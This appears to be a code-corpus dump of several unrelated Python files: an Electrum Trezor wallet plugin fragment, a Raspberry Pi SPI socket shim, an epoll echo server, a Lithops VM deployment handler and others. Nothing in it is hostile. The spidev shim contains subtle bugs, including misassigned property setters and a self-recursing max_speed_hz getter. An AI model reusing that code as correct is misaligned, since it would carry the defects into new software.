raise LibraryFoundButUnusable(library_version=version)
def enumerate(self):
# If there is a bridge, prefer that.
# On Windows, the bridge runs as Admin (and Electrum usually does not),
# so the bridge has better chances of finding devices. see #5420
# This also avoids duplicate entries.
try:
call_bridge("enumerate")
except Exception:
devices = trezorlib.transport.enumerate_devices()
else:
devices = BridgeTransport.enumerate()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key=TREZOR_PRODUCT_KEY,
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = trezorlib.transport.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
# note that this call can still raise!
return TrezorClientBase(transport, handler, self)
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Terracoin Testnet" if constants.net.TESTNET else "Terracoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, device_id)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings: TrezorInitSettings, method, device_id, wizard, handler):
if method == TIM_RECOVER and settings.recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength_from_word_count = {12: 128, 18: 192, 24: 256}
client.reset_device(
strength=strength_from_word_count[settings.word_count],
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label,
no_backup=settings.no_backup)
elif method == TIM_RECOVER:
client.recover_device(
recovery_type=settings.recovery_type,
word_count=settings.word_count,
passphrase_protection=settings.passphrase_enabled,
pin_protection=settings.pin_enabled,
label=settings.label)
if settings.recovery_type == RECOVERY_TYPE_MATRIX:
handler.close_matrix_dialog()
else:
raise RuntimeError("Unsupported recovery method")
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
if not client.is_uptodate():
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
raise OutdatedHwFirmwareException(msg)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
is_creating_wallet = purpose == HWD_SETUP_NEW_WALLET
client.get_xpub('m', 'standard', creating=is_creating_wallet)
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_trezor_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_trezor_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
prev_tx = { bfh(txhash): self.electrum_tx_to_txtype(tx, xpub_path) for txhash, tx in prev_tx.items() }
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, xpub_path, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
details = SignTx(lock_time=tx.locktime, version=tx.version)
signatures, _ = client.sign_tx(self.get_coin_name(), inputs, outputs, details=details, prev_txes=prev_tx)
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
deriv_suffix = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, *deriv_suffix)
script_type = self.get_trezor_input_script_type(wallet.txin_type)
# prepare multisig, if available:
xpubs = wallet.get_master_public_keys()
if len(xpubs) > 1:
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pairs = sorted(zip(pubkeys, xpubs))
multisig = self._make_multisig(
wallet.m,
[(xpub, deriv_suffix) for _, xpub in sorted_pairs])
else:
multisig = None
client = self.get_client(keystore)
client.show_address(address_path, script_type, multisig)
def tx_inputs(self, tx, xpub_path, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
xpubs = [parse_xpubkey(x) for x in x_pubkeys]
multisig = self._make_multisig(txin.get('num_sig'), xpubs, txin.get('signatures'))
script_type = self.get_trezor_input_script_type(txin['type'])
txinputtype = TxInputType(
script_type=script_type,
multisig=multisig)
# find which key is mine
for xpub, deriv in xpubs:
if xpub in xpub_path:
xpub_n = parse_path(xpub_path[xpub])
txinputtype.address_n = xpub_n + deriv
break
prev_hash = bfh(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def _make_multisig(self, m, xpubs, signatures=None):
if len(xpubs) == 1:
return None
pubkeys = [self._make_node_path(xpub, deriv) for xpub, deriv in xpubs]
if signatures is None:
signatures = [b''] * len(pubkeys)
elif len(signatures) != len(pubkeys):
raise RuntimeError('Mismatched number of signatures')
else:
signatures = [bfh(x)[:-1] if x else b'' for x in signatures]
return MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=signatures,
m=m)
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_trezor_output_script_type(info.script_type)
deriv = parse_path("/%d/%d" % index)
multisig = self._make_multisig(m, [(xpub, deriv) for xpub in xpubs])
txoutputtype = TxOutputType(
multisig=multisig,
amount=amount,
address_n=parse_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx, xpub_path):
t = TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
t.inputs = self.tx_inputs(tx, xpub_path)
t.bin_outputs = [
TxOutputBinType(amount=vout['value'], script_pubkey=bfh(vout['scriptPubKey']))
for vout in d['outputs']
]
return t
|
spidev.py
|
import os
import socket
_SPI_CPHA = 0x01
_SPI_CPOL = 0x02
# _SPI_MODE_0 = 0
# _SPI_MODE_1 = SPI_CPHA
# _SPI_MODE_2 = SPI_CPOL
# _SPI_MODE_3 = SPI_CPOL | SPI_CPHA
# _SPI_MODES = [_SPI_MODE_0, _SPI_MODE_1, _SPI_MODE_2, _SPI_MODE_3]
_SPI_CS_HIGH = 0x04
_SPI_LSB_FIRST = 0x08
_SPI_3WIRE = 0x10
_SPI_LOOP = 0x20
_SPI_NO_CS = 0x40
_SPI_READY = 0x80
class SpiDev:
_socket = None
_bits_per_word = 0
# cshigh = False
# loop = None
# lsbfirst = False
_max_speed_hz = 0
_mode = 0
# threewire = False
def __init__(self):
port = 8789
ip = os.environ["RASPBERRY_IP"]
if "RASPBERRY_PORT" in os.environ:
port = int(os.environ["RASPBERRY_PORT"])
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.connect((ip, port))
def __del__(self):
if self._socket is not None:
try:
self._socket.close()
except Exception as e:
pass
def open(self, bus, device):
b = bytearray()
b.append(ord("o"))
b.append(bus)
b.append(device)
self._socket.send(b)
def xfer(self, data, speed_hz=0, delay_usec=0, bits_per_word=8):
b = bytearray()
b.append(ord("x"))
b.append(len(data) & 255)
b.append(len(data) >> 8 & 255)
for d in data:
b.append(d)
self._socket.send(b)
rec = self._socket.recv(len(data))
resp = []
for bb in rec:
resp.append(bb)
return resp
def xfer2(self, data, speed_hz=0, delay_usec=0, bits_per_word=8):
pass
def close(self):
self._mode = 0;
self._bits_per_word = 0;
self._max_speed_hz = 0;
b = bytearray()
b.append(ord("c"))
self._socket.send(b)
def readbytes(self, n):
pass
def writebytes(self, data):
pass
@property
def cshigh(self):
return self._mode & _SPI_CS_HIGH != 0
@cshigh.setter
def cshigh(self, cshigh):
if cshigh:
self._mode = self._mode | _SPI_CS_HIGH
else:
self._mode = self._mode & ~_SPI_CS_HIGH
@property
def lsbfirst(self):
return self._mode & _SPI_LSB_FIRST != 0
@cshigh.setter
def lsbfirst(self, lsbfirst):
if lsbfirst:
self._mode = self._mode | _SPI_LSB_FIRST
else:
self._mode = self._mode & ~_SPI_LSB_FIRST
@property
def threewire(self):
return self._mode & _SPI_3WIRE != 0
@threewire.setter
def threewire(self, threewire):
if threewire:
self._mode = self._mode | _SPI_3WIRE
else:
self._mode = self._mode & ~_SPI_3WIRE
@property
def loop(self):
return self._mode & _SPI_3WIRE != 0
@loop.setter
def loop(self, loop):
if loop:
self._mode = self._mode | _SPI_LOOP
else:
self._mode = self._mode & ~_SPI_LOOP
@property
def bits_per_word(self):
return self._bits_per_word
@bits_per_word.setter
def bits_per_word(self, bits_per_word):
if bits_per_word < 8 or bits_per_word > 16:
raise ValueError("invalid bits_per_word (8 to 16)")
self._bits_per_word = bits_per_word
@property
def max_speed_hz(self):
return self.max_speed_hz
@max_speed_hz.setter
def bits_per_word(self, max_speed_hz):
self.max_speed_hz
@property
def mode(self):
return self._mode & (_SPI_CPHA | _SPI_CPOL)
@mode.setter
def loop(self, mode):
self._mode = (self._mode & ~(_SPI_CPHA | _SPI_CPOL)) | mode
if __name__ == "__main__":
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 8789))
s.listen(1)
def startListen():
import threading
def session(con):
while True:
# print("Waiting to command")
cmd = ord(con.recv(1))
if cmd == ord("c"):
print("Close")
elif cmd == ord("o"):
bus = ord(con.recv(1))
device = ord(con.recv(1))
print("Opening " + str(bus) + "." + str(device))
elif cmd == ord("x"):
l = ord(con.recv(1))
h = ord(con.recv(1))
size = l + h << 8
print("Receiving " + str(size) +" bytes")
data = con.recv(size)
print("Received " + str(data))
con.send(data)
else:
print("Unknown command " + str(cmd))
def listen():
while True:
con, addr = s.accept()
t = threading.Thread(target=session, args=[con])
t.daemon = True
t.start()
thread = threading.Thread(target=listen)
thread.daemon = True
thread.start()
try:
startListen()
os.environ["RASPBERRY_IP"] = "127.0.0.1"
spi = SpiDev()
print("opening spi")
spi.open(1, 2)
print("sending data")
spi.xfer(b"Hello")
print("closing")
spi.close()
finally:
s.close()
s.detach()
|
message_server.py
|
import socket
import select
import threading
import time
import message
class MessageServer(object):
def __init__(self, host, port, timeout=1):
self.host = host
self.port = port
self.timeout = timeout
self.epoll = select.epoll()
self.fd_to_socket = {}
self.client_buffer = {}
self.mssocket = self.init_server()
def init_server(self):
mssocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
mssocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
address = (self.host, self.port)
mssocket.bind(address)
mssocket.listen(100)
self.epoll.register(mssocket.fileno(), select.EPOLLIN)
self.fd_to_socket[mssocket.fileno()] = mssocket
return mssocket
def close_server(self):
self.mssocket.close()
print "Server closed!"
def server_cron(self):
print "Run server cron"
def process(self, fd, type, data):
#print "Process message here"
# for test
if type == message.message_echo_type:
self.add_reply(fd, type, data)
else:
print "error message type", type
def close_client(self, fd):
self.epoll.unregister(fd)
socket = self.fd_to_socket[fd]
socket.close()
del self.fd_to_socket[fd]
del self.client_buffer[fd]
def add_reply(self, fd, type, data):
print "reply:", fd, type, data
if data is None or len(data) == 0:
return
write_buffer = self.client_buffer[fd][1]
message.extend_message(write_buffer, type, data)
self.epoll.modify(fd, select.EPOLLOUT)
def run(self):
epoll_wait_time = self.timeout
last_server_cron_run = time.time()
print "Start to wait epoll event"
while True:
events = self.epoll.poll(epoll_wait_time)
# Run server cron
server_cron_check = time.time()
# some time the result will small then 0
# Do not know the reason now
server_cron_gap_time = max(server_cron_check - last_server_cron_run, 0)
if server_cron_gap_time > epoll_wait_time:
self.server_cron()
epoll_wait_time = self.timeout
last_server_cron_run = time.time()
else:
epoll_wait_time -= server_cron_gap_time
for fd, event in events:
socket = self.fd_to_socket[fd]
if socket == self.mssocket:
if not event & select.EPOLLIN:
print "Server error!"
exit(-1)
# new connection
connect_socket, address = self.mssocket.accept()
connect_socket.setblocking(False)
self.epoll.register(connect_socket.fileno(),
select.EPOLLIN)
self.fd_to_socket[connect_socket.fileno()] = connect_socket
# 1 for read; 2 for write
self.client_buffer[connect_socket.fileno()] = [ [], []]
elif event & select.EPOLLHUP:
print "Client close!"
self.close_client(fd)
elif event & select.EPOLLIN:
try:
data = socket.recv(1024)
except socket.error as e:
print e
continue
if not data:
print "Client close!"
self.close_client(fd)
else:
read_buffer = self.client_buffer[fd][0]
read_buffer.extend(data)
while True:
status, m, read_buffer = message.remove_message(read_buffer)
self.client_buffer[fd][0] = read_buffer
if status == message.parse_ok:
type, data = m
# process
self.process(fd, type, data)
elif status == message.buffer_not_enough:
break
else:
print "Parse message error, close Client"
self.close_client(fd)
break
elif event & select.EPOLLOUT:
write_buffer = ''.join(self.client_buffer[fd][1])
nwrite = socket.send(write_buffer)
self.client_buffer[fd][1] = list(write_buffer[nwrite:])
if len(self.client_buffer[fd][1]) == 0:
self.epoll.modify(fd, select.EPOLLIN)
self.close_server()
lock = threading.Lock()
def run_test_client():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 12346))
for i in range(8):
id = threading.currentThread().ident
data = "this id no is " + str(id) + " %d send time!" % i
buf = message.extend_message([], message.message_echo_type, data)
#print "send_totlan", len(buf)
s.sendall(''.join(buf))
read_buffer = []
target_read_size = len(buf)
total_read_size = 0
while total_read_size < target_read_size:
chunk = s.recv(min(target_read_size - total_read_size,
1024))
if len(chunk) == 0:
raise RuntimeError("connection broker")
read_buffer.extend(chunk)
total_read_size += len(chunk)
status, m, read_buffer = message.remove_message(read_buffer)
lock.acquire()
print "receive reply", status, m
lock.release()
if __name__ == '__main__':
server = MessageServer("127.0.0.1", 12346)
for i in range(100):
t = threading.Thread(target=run_test_client)
t.start()
server.run()
|
httpd.py
|
from .server import EasyServer
from .datastruct import *
import threading
__server = None
def start_serve(port: int = 8090, address: str = "0.0.0.0", blocking=True):
global __server
if __server is None:
try:
__server = EasyServer(port, address)
if not blocking:
thread = threading.Thread(target=__server.serve_forever)
thread.start()
return thread
else:
__server.serve_forever()
except Exception as e:
print(str(e))
def requestMapping(path, methods=[m for m in Method]):
def converter(listener):
EasyServer.addRequestListener(path, methods, listener)
return listener
return converter
def get(path):
return requestMapping(path, [Method.GET])
def post(path):
return requestMapping(path, [Method.POST])
|
__init__.py
|
import json
from datetime import datetime
from threading import Thread
from outdated import utils
from outdated.mywarnings import *
from outdated.utils import warn_with_ignore
__version__ = '0.2.0'
def check_outdated(package, version):
"""
Given the name of a package on PyPI and a version (both strings), checks
if the given version is the latest version of the package available.
Returns a 2-tuple (is_outdated, latest_version) where
is_outdated is a boolean which is True if the given version is earlier
than the latest version, which is the string latest_version.
Attempts to cache on disk the HTTP call it makes for 24 hours. If this
somehow fails the exception is converted to a warning (OutdatedCacheFailedWarning)
and the function continues normally.
"""
from pkg_resources import parse_version
parsed_version = parse_version(version)
latest = None
with utils.cache_file(package, 'r') as f:
content = f.read()
if content: # in case cache_file fails and so f is a dummy file
latest, cache_dt = json.loads(content)
if not utils.cache_is_valid(cache_dt):
latest = None
def get_latest():
url = 'https://pypi.python.org/pypi/%s/json' % package
response = utils.get_url(url)
return json.loads(response)['info']['version']
if latest is None:
latest = get_latest()
parsed_latest = parse_version(latest)
if parsed_version > parsed_latest:
# Probably a stale cached value
latest = get_latest()
parsed_latest = parse_version(latest)
if parsed_version > parsed_latest:
raise ValueError('Version %s is greater than the latest version on PyPI: %s' %
(version, latest))
is_latest = parsed_version == parsed_latest
assert is_latest or parsed_version < parsed_latest
with utils.cache_file(package, 'w') as f:
data = [latest, utils.format_date(datetime.now())]
json.dump(data, f)
return not is_latest, latest
def warn_if_outdated(package,
version,
raise_exceptions=False,
background=True,
):
"""
Higher level convenience function using check_outdated.
The package and version arguments are the same.
If the package is outdated, a warning (OutdatedPackageWarning) will
be emitted.
Any exception in check_outdated will be converted to a warning (OutdatedCheckFailedWarning)
unless raise_exceptions if True.
If background is True (the default), the check will run in
a background thread so this function will return immediately.
In this case if an exception is raised and raise_exceptions if True
the traceback will be printed to stderr but the program will not be
interrupted.
This function doesn't return anything.
"""
def check():
# noinspection PyUnusedLocal
is_outdated = False
with utils.exception_to_warning('check for latest version of package',
OutdatedCheckFailedWarning,
always_raise=raise_exceptions):
is_outdated, latest = check_outdated(package, version)
if is_outdated:
warn_with_ignore(
'The package %s is out of date. Your version is %s, the latest is %s.'
% (package, version, latest),
OutdatedPackageWarning,
)
if background:
thread = Thread(target=check)
thread.start()
else:
check()
warn_if_outdated('outdated', __version__)
|
standalone.py
|
#
# Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import shlex
import json
import time
import select
import logging
import importlib
import requests
from threading import Thread
from lithops.utils import is_lithops_worker, create_handler_zip
from lithops.constants import LOGS_DIR, REMOTE_INSTALL_DIR, FN_LOG_FILE
from lithops.storage.utils import create_job_key
logger = logging.getLogger(__name__)
FH_ZIP_LOCATION = os.path.join(os.getcwd(), 'lithops_standalone.zip')
PROXY_SERVICE_NAME = 'lithopsproxy.service'
PROXY_SERVICE_PORT = 8080
PROXY_SERVICE_FILE = """
[Unit]
Description=Lithops Proxy
After=network.target
[Service]
ExecStart=/usr/bin/python3 {}/proxy.py
Restart=always
[Install]
WantedBy=multi-user.target
""".format(REMOTE_INSTALL_DIR)
class StandaloneHandler:
"""
A StandaloneHandler object is used by invokers and other components to access
underlying standalone backend without exposing the implementation details.
"""
def __init__(self, standalone_config):
self.log_active = logger.getEffectiveLevel() != logging.WARNING
self.config = standalone_config
self.backend_name = self.config['backend']
self.runtime = self.config['runtime']
self.is_lithops_worker = is_lithops_worker()
self.start_timeout = self.config.get('start_timeout', 300)
self.auto_dismantle = self.config.get('auto_dismantle')
self.hard_dismantle_timeout = self.config.get('hard_dismantle_timeout')
self.soft_dismantle_timeout = self.config.get('soft_dismantle_timeout')
try:
module_location = 'lithops.standalone.backends.{}'.format(self.backend_name)
sb_module = importlib.import_module(module_location)
StandaloneBackend = getattr(sb_module, 'StandaloneBackend')
self.backend = StandaloneBackend(self.config[self.backend_name])
except Exception as e:
logger.error("There was an error trying to create the "
"{} standalone backend".format(self.backend_name))
raise e
self.log_monitors = {}
self.ssh_credentials = self.backend.get_ssh_credentials()
self.ip_address = self.backend.get_ip_address()
from lithops.util.ssh_client import SSHClient
self.ssh_client = SSHClient(self.ssh_credentials)
logger.debug("Standalone handler created successfully")
def _is_backend_ready(self):
"""
Checks if the VM instance is ready to receive ssh connections
"""
try:
self.ssh_client.run_remote_command(self.ip_address, 'id', timeout=2)
except Exception:
return False
return True
def _wait_backend_ready(self):
"""
Waits until the VM instance is ready to receive ssh connections
"""
logger.info('Waiting VM instance to become ready')
start = time.time()
while(time.time() - start < self.start_timeout):
if self._is_backend_ready():
return True
time.sleep(1)
self.dismantle()
raise Exception('VM readiness probe expired. Check your VM')
def _start_backend(self):
if not self._is_backend_ready():
# The VM instance is stopped
init_time = time.time()
self.backend.start()
self._wait_backend_ready()
total_start_time = round(time.time()-init_time, 2)
logger.info('VM instance ready in {} seconds'.format(total_start_time))
def _is_proxy_ready(self):
"""
Checks if the proxy is ready to receive http connections
"""
try:
if self.is_lithops_worker:
url = "http://{}:{}/ping".format('127.0.0.1', PROXY_SERVICE_PORT)
r = requests.get(url, timeout=1, verify=True)
if r.status_code == 200:
return True
return False
else:
cmd = 'curl -X GET http://127.0.0.1:8080/ping'
out = self.ssh_client.run_remote_command(self.ip_address, cmd, timeout=2)
data = json.loads(out)
if data['response'] == 'pong':
return True
except Exception:
return False
def _wait_proxy_ready(self):
"""
Waits until the proxy is ready to receive http connections
"""
logger.info('Waiting Lithops proxy to become ready')
start = time.time()
while(time.time() - start < self.start_timeout):
if self._is_proxy_ready():
return True
time.sleep(1)
self.dismantle()
raise Exception('Proxy readiness probe expired. Check your VM')
def _start_log_monitor(self, executor_id, job_id):
"""
Starts a process that polls the remote log into a local file
"""
job_key = create_job_key(executor_id, job_id)
def log_monitor():
os.makedirs(LOGS_DIR, exist_ok=True)
log_file = os.path.join(LOGS_DIR, job_key+'.log')
fdout_0 = open(log_file, 'wb')
fdout_1 = open(FN_LOG_FILE, 'ab')
ssh_client = self.ssh_client.create_client(self.ip_address)
cmd = 'tail -n +1 -F /tmp/lithops/logs/{}.log'.format(job_key)
stdin, stdout, stderr = ssh_client.exec_command(cmd)
channel = stdout.channel
stdin.close()
channel.shutdown_write()
data = None
while not channel.closed:
try:
readq, _, _ = select.select([channel], [], [], 10)
if readq and readq[0].recv_ready():
data = channel.recv(len(readq[0].in_buffer))
fdout_0.write(data)
fdout_0.flush()
fdout_1.write(data)
fdout_1.flush()
else:
if data:
cmd = 'ls /tmp/lithops/jobs/{}.done'.format(job_key)
_, out, _ = ssh_client.exec_command(cmd)
if out.read().decode().strip():
break
time.sleep(0.5)
except Exception:
pass
if not self.is_lithops_worker:
Thread(target=log_monitor, daemon=True).start()
logger.debug('ExecutorID {} | JobID {} - Remote log monitor '
'started'.format(executor_id, job_id))
def run_job(self, job_payload):
"""
Run the job description against the selected environment
"""
executor_id = job_payload['executor_id']
job_id = job_payload['job_id']
job_key = create_job_key(executor_id, job_id)
log_file = os.path.join(LOGS_DIR, job_key+'.log')
if not self._is_proxy_ready():
# The VM instance is stopped
if not self.log_active:
print('ExecutorID {} - Starting VM instance' .format(executor_id))
init_time = time.time()
self.backend.start()
self._wait_proxy_ready()
total_start_time = round(time.time()-init_time, 2)
logger.info('VM instance ready in {} seconds'.format(total_start_time))
self._start_log_monitor(executor_id, job_id)
logger.info('ExecutorID {} | JobID {} - Running job'
.format(executor_id, job_id))
logger.info("View execution logs at {}".format(log_file))
if self.is_lithops_worker:
url = "http://{}:{}/run".format('127.0.0.1', PROXY_SERVICE_PORT)
r = requests.post(url, data=json.dumps(job_payload), verify=True)
response = r.json()
else:
cmd = ('curl -X POST http://127.0.0.1:8080/run -d {} '
'-H \'Content-Type: application/json\''
.format(shlex.quote(json.dumps(job_payload))))
out = self.ssh_client.run_remote_command(self.ip_address, cmd)
response = json.loads(out)
return response['activationId']
def create_runtime(self, runtime):
"""
Installs the proxy and extracts the runtime metadata and
preinstalled modules
"""
self._start_backend()
self._setup_proxy()
self._wait_proxy_ready()
logger.info('Extracting runtime metadata information')
payload = {'runtime': runtime}
if self.is_lithops_worker:
url = "http://{}:{}/preinstalls".format('127.0.0.1', PROXY_SERVICE_PORT)
r = requests.get(url, data=json.dumps(payload), verify=True)
runtime_meta = r.json()
else:
cmd = ('curl http://127.0.0.1:8080/preinstalls -d {} '
'-H \'Content-Type: application/json\' -X GET'
.format(shlex.quote(json.dumps(payload))))
out = self.ssh_client.run_remote_command(self.ip_address, cmd)
runtime_meta = json.loads(out)
return runtime_meta
def get_runtime_key(self, runtime_name):
"""
Wrapper method that returns a formated string that represents the
runtime key. Each backend has its own runtime key format. Used to
store modules preinstalls into the storage
"""
return self.backend.get_runtime_key(runtime_name)
def dismantle(self):
"""
Stop VM instance
"""
self.backend.stop()
def init(self):
"""
Start the VM instance and initialize runtime
"""
self._start_backend()
# Not sure if mandatory, but sleep several seconds to let proxy server start
time.sleep(2)
# if proxy not started, install it
if not self._is_proxy_ready():
self._setup_proxy()
self._wait_proxy_ready()
def clean(self):
pass
def _setup_proxy(self):
logger.info('Installing Lithops proxy in the VM instance')
logger.debug('Be patient, installation process can take up to 3 minutes '
'if this is the first time you use the VM instance')
service_file = '/etc/systemd/system/{}'.format(PROXY_SERVICE_NAME)
self.ssh_client.upload_data_to_file(self.ip_address, PROXY_SERVICE_FILE, service_file)
cmd = 'rm -R {}; mkdir -p {}; '.format(REMOTE_INSTALL_DIR, REMOTE_INSTALL_DIR)
cmd += 'systemctl daemon-reload; systemctl stop {}; '.format(PROXY_SERVICE_NAME)
self.ssh_client.run_remote_command(self.ip_address, cmd)
config_file = os.path.join(REMOTE_INSTALL_DIR, 'config')
self.ssh_client.upload_data_to_file(self.ip_address, json.dumps(self.config), config_file)
src_proxy = os.path.join(os.path.dirname(__file__), 'proxy.py')
create_handler_zip(FH_ZIP_LOCATION, src_proxy)
self.ssh_client.upload_local_file(self.ip_address, FH_ZIP_LOCATION, '/tmp/lithops_standalone.zip')
os.remove(FH_ZIP_LOCATION)
# Install dependenices
cmd = 'apt-get update; apt-get install unzip python3-pip -y; '
cmd += 'pip3 install flask gevent pika==0.13.1; '
cmd += 'unzip -o /tmp/lithops_standalone.zip -d {} > /dev/null 2>&1; '.format(REMOTE_INSTALL_DIR)
cmd += 'rm /tmp/lithops_standalone.zip; '
cmd += 'chmod 644 {}; '.format(service_file)
# Start proxy service
cmd += 'systemctl daemon-reload; '
cmd += 'systemctl stop {}; '.format(PROXY_SERVICE_NAME)
cmd += 'systemctl enable {}; '.format(PROXY_SERVICE_NAME)
cmd += 'systemctl start {}; '.format(PROXY_SERVICE_NAME)
self.ssh_client.run_remote_command(self.ip_address, cmd, background=True)
|
team_manager.py
|
# -*- coding: utf-8 -*-
"""
This file is covered by the LICENSING file in the root of this project.
"""
import sys
from werkzeug.exceptions import Forbidden
sys.path.append("..")
import uuid
import time
from flask import g
import threading
from mongoengine import Q, ValidationError
from os.path import realpath, abspath, dirname
from hackathon import Component, RequiredFeature
from hackathon.hmongo.models import Team, TeamMember, TeamScore, TeamWork, Hackathon, UserHackathon, to_dic
from hackathon.hackathon_response import not_found, bad_request, precondition_failed, ok, forbidden
